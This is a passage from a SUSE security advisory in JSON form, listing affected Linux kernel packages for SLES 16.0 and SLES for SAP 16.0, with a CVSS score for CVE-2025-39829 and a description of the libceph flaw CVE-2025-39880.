"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-39829"
},
{
"cve": "CVE-2025-39880",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-39880"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix invalid accesses to ceph_connection_v1_info\n\nThere is a place where generic code in messenger.c is reading and\nanother place where it is writing to con-\u003ev1 union member without\nchecking that the union member is active (i.e. msgr1 is in use).\n\nOn 64-bit systems, con-\u003ev1.auth_retry overlaps with con-\u003ev2.out_iter,\nso such a read is almost guaranteed to return a bogus value instead of\n0 when msgr2 is in use. This ends up being fairly benign because the\nside effect is just the invalidation of the authorizer and successive\nfetching of new tickets.\n\ncon-\u003ev1.connect_seq overlaps with con-\u003ev2.conn_bufs and the fact that\nit\u0027s being written to can cause more serious consequences, but luckily\nit\u0027s not something that happens often.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
